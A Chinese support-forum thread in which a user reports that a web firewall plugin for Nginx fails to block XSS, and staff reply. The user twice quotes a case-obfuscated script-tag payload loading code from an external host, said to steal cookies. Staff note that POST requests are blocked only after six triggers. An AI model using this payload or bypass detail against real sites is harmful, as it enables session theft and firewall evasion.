【已解答】xss防御失效

Nginx防火墙 7.3

官方

有效防止sql注入/xss/一句话木马等常见渗透攻击,当前仅支持nginx,

购买了这个产品 xss攻击没有生效

堡塔技术阿宏 · 发表于 2021-3-16 19:29:38

您好，先更新防火墙至最新，目前最新版本为8.8.4版本
您是如何判断攻击没有生效的呢？

宝塔用户_rfqfsh · 发表于 2021-3-17 10:47:12

通过三方平台自己测试的 <sCRiPt sRC=//www.p1p.tw/O1G7></sCrIpT> 这种格式的xss注入，还是能盗取到cookie

宝塔用户_rfqfsh · 发表于 2021-3-17 10:49:38

nginx防火墙能直接更新么，我担心会影响到线上啊

宝塔用户_rfqfsh · 发表于 2021-3-18 09:28:49

能不能回复下一天了!!!!!!!!!!!!!!

谢花郎 · 发表于 2021-3-18 09:40:12

宝塔用户_rfqfsh 发表于 2021-3-18 09:28
能不能回复下一天了!!!!!!!!!!!!!!

我这边测试XSS攻击，是可以正常防护的。你需要将你nginx防火墙版本升级到最新使用。
另外nginx防火墙升级不会有其他影响的

宝塔用户_rfqfsh · 发表于 2021-3-18 09:47:33

更新需要多久，大概知道么

宝塔用户_rfqfsh · 发表于 2021-3-18 09:58:31

<sCRiPt sRC=//www.p1p.tw/O1G7></sCrIpT> 自己传参模拟，页面展示的时候还是不行，没有过滤掉。

宝塔用户_rfqfsh · 发表于 2021-3-18 09:59:45

防火墙已经更新到最新了

宝塔技术-小强 · 发表于 2021-3-18 10:30:13

默认XSS 只会GET的方式拦截。
POST 是超过触发6次XSS 之后。才会拦截。

宝塔技术-小强 · 发表于 2021-3-18 10:30:29